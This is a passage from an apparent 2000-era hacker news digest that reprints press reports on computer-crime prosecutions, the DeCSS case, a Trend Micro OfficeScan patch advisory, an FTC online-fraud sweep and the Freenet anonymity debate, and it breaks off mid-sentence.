From HNN http://www.hackernews.com/
contributed by acopalyse
After selling stolen logon names and passwords three
teenagers in Hong Kong were warned by Magistrate Ian
Candy that they faced deterrent sentences. The three
plead guilty to a total of 49 charges including the
downloading and selling of music files. Sentencing has
been scheduled for April 5th.
South China Morning Post
http://www.technologypost.com/features/Daily/20000322105804432.asp?Section
FEATURES
Teen hackers face
deterrent sentences
ELAINE PAK LI
Three teenage computer hackers were warned
yesterday that they faced deterrent sentences after they
admitted selling login names and passwords stolen from
the Internet in the first case of its kind in Hong Kong.
One of the trio, a student, was also convicted of
downloading songs from the Internet and selling them
for profit.
At Eastern Court, restaurant manager Tam Hei-lun and
clerk Po Yiu-ming, both 19, and student Mak
King-lam, 18, pleaded guilty to a total of 49 charges.
Magistrate Ian Candy remanded them in custody for
sentencing on April 5, pending reports, and said: "It is
precisely these kind of computer crimes which leave
Internet users in fear and make them pause before
conducting even the most basic of transactions.
"These criminal activities should be nipped in the bud
and a deterrent sentence must be imposed."
All the offences took place between March 1998 and
May last year.
David Leung, prosecuting, told the court Po had hacked
into other Internet users' computers and unlawfully
obtained 127 login names and passwords given to
Internet users when they subscribe to an Internet service
provider for a monthly fee and an hourly rate.
The three defendants knew each other through the
Internet and Po had sold some of his illegally obtained
login names and passwords to Tam for $3,000, but
gave others for free to Mak. Tam later resold them for
$1,500.
The three were aware that the information they obtained
was acquired illegally, the magistrate was told.
Mr Leung said the three defendants had hacked into the
accounts of Internet users of Hongkong Telecom IMS
Netvigator, Vision Network Ltd, City Telecom (HK),
Netfront Information Technology and ABC Net, saving
themselves the monthly fees and causing losses to the
account holders.
Tam admitted 14 counts of obtaining access to a
computer with a view to dishonest gain, Po admitted 12
and Mak two.
Mak also admitted 10 charges of selling pirated discs, in
which he downloaded songs from the Internet and sold
200 discs from his own Web site. Each disc contained
100 songs and was priced at $88.
Tam, who asked buyers of the logins to deposit money
into his bank account, also admitted eight counts of
dealing with property known or reasonably believed to
represent proceeds of an indictable offence.
Po admitted a further three charges of criminally
damaging the computers of three users.
@HWA
67.0 HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Macki
Martin Garbus, an internationally distinguished New York
attorney, and his firm (Frankfurt, Garbus, Klein, and
Selz) have been retained by the defense in the New
York MPAA DeCSS case. Two of the three defendants
have withdrawn under consent agreements, leaving only
2600 Magazine and its publisher Emmanuel Goldstein, as
defendant. A trail date has been set for December 5,
2000.
2600 Electronic Frontier Foundation - They are providing
funding, please show your support!
http://www.2600.com/news/2000/0324.html
http://www.eff.org
TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED
LEGAL TEAM TAKES CASE
03/24/00
The importance of the fight against the MPAA and
the DVD Copy Control Association was underlined
this week with the hiring of the legal team of
Frankfurt, Garbus, Klein, and Selz to represent
2600.
Martin Garbus, who will be the key lawyer on our
side, has defended the likes of Lenny Bruce,
Spike Lee, Samuel Beckett, Andrei Sakharov, and
Vaclav Havel and is the author of "Tough Talk,"
published in 1998. He is a renowned First
Amendment attorney and, thanks to funding from
the Electronic Frontier Foundation, we have him
in our court. Please show your support to the
EFF for taking on this important case and help
them to play a key role in whatever cases come
up in the future.
We've already seen a significant development
this week as we have been granted the time we
need to build our defense. The court was
prepared to start the trial on May 1st which is
what the plaintiffs wanted. After presenting our
arguments, we were given a court date of
December 5th. This is a very good development
for us as there is much to be prepared. An
uninformed court would have been bad for all of
us.
As the weeks and months progress, we will be in
need of expert witnesses and testimony
supporting our position. Your help and support
will be invaluable as always. We will keep you
updated as events progress.
@HWA
68.0 HNN:Mar 24th:Max Vision Indicted in San Jose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
A suspect involving computer break-ins at NASA and the
U.S. departments of energy, defense and transportation
was indicted in San Jose on Wednesday. the indictment
of Max Vision (Max Ray Butler) of Berkeley included
charges of unauthorized access of a computer,
recklessly causing damage and interception of electronic
communication for a total of 15 counts. Max Vision was
previously an FBI informant who turned himself in on
Tuesday.
Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html
Wednesday March 22 11:56 PM ET
Suspected Gov't Hacker Indicted
SAN FRANCISCO (AP) - A suspected computer hacker made his first court
appearance Wednesday after being indicted on charges of breaking into
computers belonging to NASA and the U.S. departments of energy, defense
and transportation, said federal prosecutors.
Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during
the hearing in San Jose. On March 15, he was indicted on 15 criminal
counts, including unauthorized access of a computer, recklessly causing
damage and interception of electronic communication.
All the counts carry sentences of at least six months and fines of
hundreds of thousands of dollars.
Butler, who also goes by the name of Max Vision, had been an FBI source,
helping agents solve computer crimes, authorities said. He turned himself
in on Tuesday.
Butler's attorney did not return a telephone call seeking comment.
-=-
More:
(SfGate)
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL
FBI Computer Expert Accused of Hacking
Henry K. Lee, Chronicle Staff Writer
Friday, March 24, 2000
Max Ray Butler seemed to be at the top of his game. For two years, the
computer expert was a confidential source for an elite FBI computer crime
squad, helping to ferret out scofflaws on the Internet.
Butler, also known as Max Vision, was also a self-described ``ethical
hacker'' from the Silicon Valley who boasted that he could test the
security of any computer system by penetrating it.
But Butler's cyber activity went too far, federal authorities say.
Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on
a 15-count federal indictment charging him with hacking into computers
used by the University of California at Berkeley, national laboratories,
federal departments, air force bases across the country and a NASA flight
center.
Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge
Patricia Turnbull ordered him not to use computers except for work. Butler
and his attorney, Jennifer Granick of San Francisco, could not be reached
for comment.
The indictment, handed down March 15, said Butler caused ``reckless
damage'' as a result of intrusions in May 1998. Butler was also charged
with possession, with intent to defraud, of 477 passwords belonging to
customers of a Santa Clara- based Internet service provider.
The case underscores the potential risks involved when law-enforcement
agencies use confidential informants with access to sensitive information.
``Sources are often very close to criminal activity, and sometimes they
cross the line,'' said Special Agent George Grotz, an FBI spokesman in San
Francisco.
Grotz declined to say how Butler became an FBI informant and whether he
was a federal source at the time of the alleged crimes. Grotz said Butler
is no longer associated with the agency.
Friends of the suspect told the Associated Press that Butler was caught
possibly violating the law several years ago and began working with the
FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was
unfairly targeted after refusing to comply with an FBI request.
A 22-month investigation by the FBI and military investigators ended
Tuesday morning when federal agents converged on a home on Dwight Way near
the UC Berkeley campus, where Butler lives with his his 23-year-old wife,
Kimi Winters. No one answered the door. Butler turned himself in to the
FBI in Oakland later that day.
Butler grew up in Idaho and lived with his family in Washington, where
authorities said he has a 1997 misdemeanor conviction for attempted
trafficking of stolen property.
He developed a proficiency with computers, eventually attracting the
attention of the FBI's Computer Crime Squad, which used him as a
confidential informant.
An FBI search warrant affidavit said Butler was ``well known'' to squad
members and ``has provided useful and timely information on computer
crimes in the past.''
In 1997, Butler started a company known as Max Vision in Mountain View,
specializing in ``penetration testing'' and ``ethical hacking'' procedures
in which he would simulate for clients how a hacker would penetrate their
computer systems, according to the company Web site.
``Our client penetration rate is currently 100 percent,'' the site said,
with recent clients including a large consortium of telecommunications
companies, a major motion picture company and an e-commerce online auction
service.
By 1998, Butler was living with Winters in a one-story San Jose apartment,
where the couple started up their own Web-design company, Kimi Networks,
records show. Reached by telephone yesterday, Winters hung up on a
Chronicle reporter.
It was also from that apartment, according to the FBI, that Butler hacked
into computers by using a computer software vulnerability known as a
buffer overflow, which sends commands into a system that ordinarily would
not be allowed.
Butler also allegedly invaded computers used by the Lawrence Berkeley
National Laboratory. Vern Paxson, a computer scientist at the lab, noticed
an online intruder conducting unauthorized scans of laboratory and UC
Berkeley computers in May 1998 and used a monitoring device that later
helped identify the source of the intrusions.
Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but
``not totally surprising.''
Paxson said a person later identified as Butler even sent him an
apologetic e-mail a day after the computer intrusions. Butler also somehow
obtained
a confidential incident report Paxton had filed about
the invasions, Paxson said.
@HWA
68.1 KYZSPAM: More on Max Vision.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: Dragos (email)
Further info from Dragos Ruii and the Kyxspam world domination conspiracy
url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html
Ex-FBI source charged with hacking
SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a
confidential FBI source on computer hackers has been charged with
allegedly breaking into computer systems belonging to NASA, the military
and the U.S. departments of energy, defense and transportation, the U.S.
Attorney's office said.
Max Ray Butler, 27, also known as Max Vision, was due to appear in court
on Thursday to face charges of breaking into and damaging computers as
well as possessing the passwords of customers of California Internet
service provider Aimnet.
The indictment's 15 counts carry fines ranging from $5,000 up to $250,000
and jail terms totaling more than 50 years in prison, said officials at
the U.S. Attorney's office in San Francisco.
A Federal Bureau of Investigation affidavit filed to support a search of
his home showed Butler, of Berkeley, Calif., was a confidential source for
FBI agents tracking computer crimes before authorities began their
22-month investigation of him in May 1998.
Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to
authorities in Oakland. He was scheduled to attend a bail review hearing
on Thursday in U.S. District Court in San Jose.
The arrest comes amid growing concern over a number of recent high-profile
computer hacker attacks.
But authorities said there is no connection between Butler and the
"denial-of-service" attacks in early February that temporarily cut off
customers to some of the Web's biggest sites, including Yahoo!, eBay ,
Amazon.com and E-Trade.
"There are no allegations related to denial-of-service attacks but we
would characterize this as a serious case," said U.S. attorney Ross
Nadler, chief of the office's newly created Computer Hacking and
Intellectual Property unit.
Lawyers for Butler could not be reached for comment.
The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation
after several U.S. Air Force computer systems around the country were
attacked in May 1998, although it was unclear when Butler became their
focus.
Butler is accused of hacking into computers belonging to the U.S.
Department of Energy's Argonne National Laboratories in Illinois and the
Brookhaven National Laboratory in New York; NASA's Marshall Flight Center
in Alabama; the office of the Secretary of Transportation in Washington,
D.C.; the office of the Secretary of the Department of Defense in
Washington, D.C.; and unspecified facilities of the Department of Defense,
and IDSoftware of Mesquite, Texas.
� 2000 Reuters Limited. All rights reserved.
-=-
From: Dragos Ruiu <dr@dursec.com>
To: <*>
Sent: Thursday, March 23, 2000 2:51 PM
(Hmmm.... thanks Ken for the head's up. I am also in agreement:
I don't know any of the details of the incident, but I do know that Max
has been a valuable resource and has contributed enormous amounts
of effort and knowledge to the entire computer security field.
I hope that alone is of some mitigating consideration... --dr)
Berkeley man indicted, charged with hacking government computers
Copyright � 2000 Nando Media
Copyright � 2000 Associated Press
From Time to Time: Nando's in-depth look at the 20th century
SAN FRANCISCO (March 23, 2000 8:20 a.m. EST http://www.nandotimes.com) -
A suspected computer hacker appeared in court for the first time Wednesday
after being indicted on charges of breaking into computers belonging to
NASA and the U.S. departments of energy, defense and transportation,
federal prosecutors said.
Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during
the hearing in San Jose. On March 15, he was indicted on 15 criminal counts,
including unauthorized access of a computer, recklessly causing damage and
interception of electronic communication.
All the counts carry sentences of at least six months and fines of
hundreds of thousands of dollars.
Butler, who also goes by the name of Max Vision, had been an FBI source,
helping agents solve computer crimes, authorities said. He turned himself
in Tuesday.
Butler's attorney did not return a telephone call seeking comment.
--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD,
Max Vision/whitehats.com
-=-
From: Dragos
(I guess one of the interviews on radio ran this morning.
This showed up on a local (MyBC) news page too,
funny... I don't remember giving that quote to them.
But out of all the negative light they could have
shone I'm happy with the way it was handled. --dr)
url: http://www2.mybc.com/bc/news/fs.cfm?id=172752
Friday , Mar 24, 2000
Guest speaker busted
VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled
to speak at a Vancouver conference has been arrested by the FBI.
Max Butler is charged with hacking into computers and destroying information.
One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com,
says that Butler was very well known among those in the information technology
sector.
"He ran an intrusion database, kind of like a big listing of signatures that
people use towatch for hackers intruding into their network, and it was quite
a famous data base," said Ruiu. "Lots of Fortune 500 companies and big sites
use his database as a way of protecting their networks."
Ruiu is now scrambling to find a replacement for Butler. The conference
runs May 10-12.
-=-
@HWA
69.0 HNN:Mar 24th:Koreans Attempt to Learn Security Secrets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Apocalyse Dow
The Korean Advanced Institute of Science and
Technology (KAIST) will conduct a 'hacking contest'.
the contest is set to start in June and will offer 100
Million Won in prize money for defeating a firewall. (If
they really expect to get anything out this other than
publicity they are sadly mistaken.)
Chosun
http://www.chosun.com/w21data/html/news/200003/200003220527.html
KAIST to Hold Hackers Contest
An international hacking contest will be held under the auspices of the
Korean Advanced Institute of Science and Technology (KAIST) it was
announced Wednesday. The Information Protection Education Research
Center of the institute which formally opened the same day said that it will
inject W300 million to host the First World Information Protection Contest
(WIPC) in June.
The contest will have hackers attempt to break into a firewall the center has
built. A total of W100 million prize money is prepared for the event, which
aims to find out the international standard of hackers and to test the capacity
of Korean information protection technology.
(Sim Jae-yool, jysim@chosun.com)
@HWA
70.0 HNN:Mar 24th:Rack Mount Your iMac
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Found on Slashdot
This has been posted elsewhere it is just to cool not to
link to. Who would have ever thought of hacking an
iMac into a rack-mount? Definitely a cool hardware
hack.
The iMac Rack-Mount Project
http://imac.pointinspace.com/
(Surf to the URL homeboyie! pics and plans available
for this kewl hack, someone found a use for the iMac??
- Ed)
@HWA
71.0 HNS:Mar 24th:SECRETS STOLEN
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS (Help Net Security) http://www.net-security.org/
by BHZ Friday 24 March 2000 on 5:57 PM
British police said today they were hunting a thief who had stolen a
secret service computer containing confidential information on
Northern Ireland.
Link: Yahoo!
http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html
Friday March 24 10:18 AM ET
British Intelligence Laptop Stolen at Station
LONDON (Reuters) - British police said Friday they were hunting a thief
who had stolen a secret service computer containing confidential
information on Northern Ireland.
The laptop computer was snatched while an employee of Britain's domestic
security service, MI5, was buying a ticket at London's Paddington train
station.
``I can confirm that a laptop computer was stolen from the security
service employee on March 4 at Paddington Underground (station),'' said a
government official who declined to be identified.
``The information contained in the laptop was well protected and we
believe it to be secure. We are not prepared to discuss the nature of the
material.''
The information on the computer was understood to be heavily encrypted and
was related to the situation in Northern Ireland, but not to refer to the
state of the peace process or any guerrilla threat.
A spokesman for Prime Minister Tony Blair said
officials were always concerned at the loss of any
sensitive material, but they were confident it was
secure and that national security had not been
threatened.
``We believe this is an opportunistic theft and
not a deliberate attempt to gain access to
security service information,'' he said.
Asked why agents were walking around with security
information on computers, the spokesman said there
were strict procedures for moving classified
material. ``You can certainly say they've been
tightened since this incident,''
he added.
The Sun newspaper said a squad of 150 police were working around the clock
to catch the thief. Before the start of the 1991 Gulf War in Kuwait and
Iraq, a laptop said to have contained war plans was stolen from the car of
a Royal Air Force officer, who lost his job as a result.
The latest theft comes as the peace process in Northern Ireland is in
disarray.
Last month Britain decided to suspend a fledgling home-rule government
over lack of progress on disarmament by Irish Republican Army guerrillas.
@HWA
72.0 HNS:Mar 24th:PATCH RELEASED BY TREND MICRO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS (Help Net Security) http://www.net-security.org/
by BHZ Friday 24 March 2000 on 5:43 PM
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server(IIS).
Link: Bugware
http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085,
Patch available for OfficeScan vulnerability
Posted to BugTraq on March 24, 2000
Security Focus BugTraq ID: 1057
Posted: March 22, 2000
Summary
=======
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server (IIS). These versions of OfficeScan allow intruders within a
firewall to invoke OfficeScan CGIs on the server without
authentication - bypassing OfficeScan management console
password protection. These OfficeScan CGIs are intended for
administrator to manage OfficeScan antivirus running on networked
workstations via the OfficeScan management console. By gaining
access to execute these CGIs, hackers can use them to change
OfficeScan antivirus configurations or to uninstall OfficeScan
antivirus on thedesktops.
Issues
======
Trend OfficeScan version 3.51 or earlier versions apply inadequate
security settings on the OfficeScan server CGI components. If a
malicious user, has the ability to connect to the OfficeScan server
via a web browser, these CGIs can be executed to send valid
commands - including uninstall command - to OfficeScan clients. In
addition, OfficeScan's implementation of user authentication in its
management console - password protection - was insufficiently
encrypted, and allows a malicious user to decrypt and gain access
to the OfficeScan management console.
Implementation
==============
Trend Micro has released a patch that will secure access to the
OfficeScan CGIs on the server. The patch program changes the file
permissions on the OfficeScan CGIs, so only administrators can
access and execute them. This patch works only on drives
formatted to use Windows NT file system (NTFS). After applying this
patch, hackers will no longer be able to remotely invoke OfficeScan
CGIs without being authenticated as a administrator by NTFS
security. This patch also prevents hackers, who sniffs for OfficeScan
management console password over the network, from gaining
access to the OfficeScan management console. Access to the
OfficeScan management console or to execute OfficeScan CGIs
now requires NTFS authentication.
Affected Software Versions
==========================
Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5
This vulnerability is only present when the above software version is
installed on a Windows NT server with IIS. It is not present when the
above software version is installed on Novell NetWare servers or
Windows NT server without IIS.
Patch Availability
==================
OfficeScan Unauthenticated CGI Usage patch can be downloaded
from:
http://www.antivirus.com/download/ofce_patch.htm
More Information
================
Please see the following references for more information related to
this issue.
- Trend Micro Security Bulletin:
http://www.antivirus.com/download/ofce_patch_351.htm
- Frequently Asked Questions: Trend Micro Knowledge Base
http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Trend
MicroTechnical Support is available at
http://www.trend.com/support/default.htm
Acknowledgements
================
Trend Micro thanks Gregory Duchemin
http://www.securite-internet.com and Elias Levy
http://www.securityfocus.com for reporting the OfficeScan server
vulnerability to us, and working with us to protect our customers.
@HWA
73.0 HNS:Mar 24th:PRIVACY ISSUES
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Friday 24 March 2000 on 5:32 PM
The idea that privacy and security might be symptoms and not the
problem emerged from a recent Webmaster focus group discussion
with the Office of Personnel Management on defining Webmaster
classifications.
Link: FCW
http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp
COMMENT
Privacy, security on the Web require business
know-how
FCW's Dot-gov Thursday column
BY Rich Kellet
03/23/2000
The idea that privacy and security might be symptoms and not the problem emerged
from a recent Webmaster focus group discussion with the Office of Personnel
Management on defining Webmaster classifications.
We worked through the usual issues of defining technology Webmasters and content
Webmasters. As we moved from the discussion of specialists to the issue of World
Wide Web managers, an interesting perspective emerged from our discussions.
Anecdotes and informal surveys are showing that about half of the Webmaster
community works in mission-oriented program offices, which are not information
technology organizations.
This led to a discussion of the difference between managers in program
organizations and managers in technology organizations. Web managers in program
organizations tend to be business managers and Web managers in IT organizations
tend to be technology managers. The conclusion of this discussion was to define a
"breed" of Web manager under an IT series that is a technology manager or "Web
technology manager"
So, what about the concept of a classification for a Web business manager? I asked
the group if anyone knew of a classification for business managers in the federal
government. To my surprise, there does not appear to be one.
It is important to pause at this point and consider what this means. Individuals who
obtain business degrees, undergraduate or higher, have qualifications in an area
recognized by the private sector as a unique skill and a profession in its own right.
These skills are essential to running large programs that deliver the government�s
products and services to the public or other agencies.
When I developed the top skill areas that a federal Web manager needs so that the
Webmaster can deliver programs online, to my own surprise, most of the required
skills originated from business skills, such as accounting and financial management
and budgeting.
As I looked across government, I found surprisingly little information on what it
means to run a business in the federal government context. There is plenty of
information on, for instance, project management, but managing a project is not
running a business. There is plenty of information on policy, but carrying out policy
is not a running business. There is plenty on management, but management skills are
not the only skills required to run a business.
Courses in small business or college programs in business administration provide
samples of the curriculums that define the skills needed to run a business. Running a
business over the Web in government is about understanding, integrating and
applying principles and processes related to leadership, culture, business processes
and components, management, policy, and technology into a functioning
organization that delivers a set of products and services to the public or other
agencies.
The issues of privacy and security are difficult to incorporate into Web sites
because they challenge our abilities as business managers. Privacy and security are
not "modules" you can buy off the shelf. It is not solely a technology issue, a people
issue or a system issue. Privacy and security are "embedded and threaded"
throughout the business processes, the organization�s working knowledge and the
supporting technology infrastructure.
At each level of the architecture and in the operations of the business, people and
assets (routers, servers, operating systems and other components) Web masters
must incorporate privacy and security concepts and solutions. To solve privacy and
security requires a commitment to re-inventing business processes, developing the
organization�s business and technology skills, and improving the underlying
infrastructure.
This is the stuff of a Web business manager. This is far beyond just "plugging holes"
in operating systems or applications. Solving privacy and security is an
enterprisewide issue that requires Web business leaders working with other business
leaders in the agency.
With the Web becoming the central construct for delivering products and services,
the government is going to need Web business managers. We have many now, and
we need to continue to grow this portion of the work force.
So, where does that leave us? Not surprisingly, it is a business decision to decide
whether to solve these issues by funding them appropriately, to develop business
processes that incorporate privacy and security, and to build and continuously
improve our organizational knowledge for putting in place privacy and security
solutions. We can spend a lot of time on chasing privacy or security holes or solve
the problem more efficiently and in less time by looking at the whole business.
-- Kellet is founder of the Federal Web Business Council, co-chair of the Federal
Webmaster Forum, and is director of GSA�s Emerging IT Policies Division.
@HWA
74.0 HNS:Mar 24th:TARGETING ONLINE SCAMMERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Friday 24 March 2000 on 11:34 AM
Law enforcement officials from 27 countries and 45 states have
conducted a massive sweep of the Internet searching for
"get-rich-quick" schemes and scams, the Federal Trade
Commission said Thursday.
Link: ZDNet
http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html
Authorities target online
scammers
By Margaret Kane, ZDNet News
03/23/2000 10:22
Law enforcement officials from 27 countries and
45 states have conducted a massive sweep of
the Internet searching for "get-rich-quick"
schemes and scams, the Federal Trade
Commission said Thursday.
More than 1,600 sites were uncovered in the
"Get-Rich-Quick.con" program, one of several
"surfs" the agency conducted looking for problems
and crimes on the Net.
The latest sweep hooked up law enforcement
officials across state and national borders and
involved hundreds of researchers who scoured the
Net for scam artists.
Many languages, one voice "We want them to know
that the borderless Internet marketplace is not a free
zone for fraud," said Jodie Bernstein, director of the
FTC Bureau of Consumer Protection. "Though we
speak different languages on the subject of Internet
fraud, we speak with one voice. Our message is:
Con artists will not threaten the safety of the Net."
'We're going to run them out of town, and run them
off the Web'|Drew Edmondson, Oklahoma attorney
general Some of the schemes promised users
rewards such as "surf the Net and earn $100 an
hour," he said. Authorities also found a variety of
pyramid schemes, outrageous product claims and
outright fraud.
The sites are sent e-mail warnings, and
documentation of the sites is provided to law
enforcement agencies in the various jurisdictions,
which will be able to further investigate and press
charges, if necessary.
Bernstein said the agencies could begin filing
charges in June or July.
Calling out the cyberposse "As an old prosecutor I'm
looking forward to Phase Two. Once we've
investigated, as the old sheriff would do, we're going
to run them out of town and run them off the Web,"
said Drew Edmondson, Oklahoma attorney general.
"And where appropriate we'll put them in jail."
It came as no surprise to speakers at Thursday's
news conference that con artists have migrated
onto the Web. About half of the U.S. Postal
Service's mail fraud investigations begin as online
solicitations, said Lawrence Maxwell, USPS
inspector in charge of fraud, prohibited mailings and
forfeiture investigations.
It's easy for con artists to target consumers "in an
age dominated by a 'Who Wants to be a Millionaire'
mentality," said Richard Walker, enforcement
director for the Securities and Exchange
Commission.
@HWA
75.0 HNS:Mar 24th:FEARS OF FREENET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Friday 24 March 2000 on 11:30 AM
A report by a British scientific magazine suggests that an
anonymous Internet system designed to guarantee free speech
online could be used by child pornographers, terrorists and others
with less-than-pristine purposes.
Link: Computer Currents
http://www.currents.net/newstoday/00/03/24/news5.html
Daily News
Freenet Raises Security
Fears
By Martin Stone, Newsbytes
March 24, 2000
A report by a British scientific magazine suggests that an
anonymous Internet system designed to guarantee free speech
online could be used by child pornographers, terrorists and
others with less-than-pristine purposes.
A Reuters report today said a New Scientist magazine article
on the Freenet program, which was created by Edinburgh
University graduate Ian Clarke and others to make tracing file
originators impossible, thereby giving dissidents in countries
without free speech a voice, could be misused by those with
sinister designs.
The report stated that the Internet Watch Foundation, an
independent body monitoring Web sites in Britain, fears the
decentralized system could make policing the Net and tracking
down computer crimes even more difficult.
"There is clear potential for misuse by criminals, terrorists and
pedophiles," Roger Darlington, chairman of the foundation, told
the weekly magazine in its latest issue, Reuters reported.
Users of Freenet are difficult to track down because files do not
contain a unique Web address and are distributed on
computers belonging to Freenet members. To retrieve a file,
users enter the key, Reuters said.
According to Clarke, a single computer user cannot be held
responsible for Freenet files because the originator cannot be
traced.
"It's perfect machine anarchy," he is quoted as saying. "No
single computer is in control."
Reported by Newsbytes.com
@HWA
75.1 Anonymous net access aiding and abetting online criminals?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: Dragos Ruii
url: http://www.wired.com/news/technology/0,1282,34768,00.html
Alternative Net Protects Pirates
by Leander Kahney
3:00 a.m. 8.Mar.2000 PST
Open-source advocates are developing an alternative publishing network
that promises to provide true anonymity in sharing documents and files
over the Internet.
But in addition to protecting free speech, the new system also could be a
boon for multimedia pirates.
Freenet is an open-source file-transfer system similar to the Web for
sharing digital content such as HTML pages and MP3 music files. It will be
run by connected clusters of servers or node stations that could in turn
be run on almost any PC connected to the Internet.
But unlike the Web, Freenet has no centralized administrative
infrastructure of domain name servers (DNS) and IP addresses that can be
used to track users. Hosting and replicating documents and files requires
that Freenet backers volunteer their time and resources.
Because Freenet aims to be anonymous, secure, and without centralized
control, it would make it almost impossible to trace people who post
content -- legal or otherwise -- onto the network.
"My primary motivation was to make it very difficult to censor
information," said Ian Clarke, an Irish programmer who designed the
system. "With the Internet there's the potential to censor and monitor
people to a degree that's never been possible before. I wanted to develop
the technology to make this impossible."
Clarke started work on Freenet 18 months ago as a graduate student in
artificial intelligence at Edinburgh University.
He had been outraged by the Australian government's proposal to introduce
sweeping censorship laws, which went into effect in January.
Clarke hopes to launch the first public version in the spring, but he said
the system is still pretty rough. The server is nearly finished, but so
far there are no browsers, or clients, to make the network easy to use.
Freenet software will be released under the GNU public license, which will
allow anyone to freely distribute and change the source code. The system
is being written in Java by about a dozen programmers internationally.
They have never met nor even spoken over the phone -- all communication is
by email, Clarke said.
Both authors and readers can choose to be anonymous if they so wish,
Clarke said. Like the Web, the network is navigated by a client, or
browser.
He said it will even be difficult to determine if someone is running a
Freenet server and what information is being stored on it, Clarke said.
Alex Fowler of the Electronic Frontier Foundation said that while he
generally supports anti-censorship tools, Freenet could create as many
problems as it solves.
Fowler said that Freenet could be a useful tool in countries like
Singapore or China that censor the Net or quash free speech. But he
doesn't like the idea that you wouldn't be able to remove sensitive
information -- such as someone's medical records.
"There's no way to tell if a project like this will actually take off," he
said. "It's certainly going to raise some questions with a whole lot of
people. Not just copyright holders, but governments too."
Patrick Ball, deputy director of the Science and Human Rights Program with
the American Association for the Advancement for Science, said tools like
anonymizers, strong cryptography, and Freenet tend not to help activists
who are not already under surveillance because using them is in itself
suspicious and tends to alert the authorities.
"I'm for any application that protects dissidents," he said. "But there's
a higher order problem that's very difficult to get around, and that's by
using these tools you draw attention to yourself."
Although Clarke designed Freenet to protect free speech, he thinks that
the safeguards they are building in to make it difficult to track down
those who distribute content could lead to its notoriety as a vehicle for
copyright piracy.
The system was designed to make it impossible to find out where files are
physically stored. Information posted to the network is stored on multiple
servers simultaneously, making it difficult to remove a file.
In fact, Clarke said any attempt to remove information causes it to be
copied to other servers on the network.
The only way to remove information is to disable the entire network, which
may prove difficult if it becomes popular and is running on thousands of
PCs all over the globe.
However, Clarke said the network cannot be guaranteed to permanently store
information. Only popular files survive for any period of time. Older,
unpopular files would be overwritten by more popular ones.
"As a project we don't want to be labeled as hackers who distribute warez
or copyrighted material," he said. "The purpose of Freenet is to promote
freedom of information, but there is an inevitable consequence there that
it might lead to violation of copyright law."
"The potential for protecting freedom of speech is more important than
protecting copyright, which is an economic tool," Clarke added.
Clark noted that Freenet can be functionally identical to Napster, the
wildly popular network for sharing music online. But while the Recording
Industry Association of America is currently seeking a court order to shut
down Napster's central servers, it would be almost impossible to disable a
Freenet network running on machines all over the world.
"Because it's decentralized no one can be held responsible for it," Clarke
said. "Once it's released there's no point coming after me because there's
nothing I, nor anyone else, can do to shut it down."
Eric Sheirer, a music technology researcher at MIT's Media Lab, said
Freenet is an interesting experiment, but said it would likely be used
only by a small community of pirates and "privacy nuts."
"If it is adopted, it will be adopted by people who want to exchange
illegal information and by people who are rabid about privacy and
security, which is a relatively small universe," Sheirer said.
Sheirer pointed out that the Web is trustworthy because of the content on
certain domains, and he likes the convenience of tracking devices such as
cookies that remember log-in names and passwords.
"Many of the advantages of Freenet are disadvantages to me," he said.
Nonetheless, Sheirer said the advent of Freenet and Gnapster, an
